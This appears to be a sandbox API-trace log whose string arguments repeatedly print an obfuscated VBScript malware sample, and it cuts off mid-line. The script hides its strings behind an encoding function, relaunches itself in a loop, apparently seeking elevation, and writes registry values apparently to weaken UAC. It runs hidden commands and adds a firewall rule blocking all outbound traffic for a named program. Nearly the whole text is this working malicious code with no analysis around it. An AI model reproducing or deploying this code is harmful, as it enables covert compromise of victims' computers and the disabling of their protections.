(fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.333] wcsncmp (_String1="CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.333] wcsncmp (_String1="reateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.333] wcsncmp (_String1="eateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.333] wcsncmp (_String1="ateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 84 [0226.333] wcsncmp (_String1="teObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 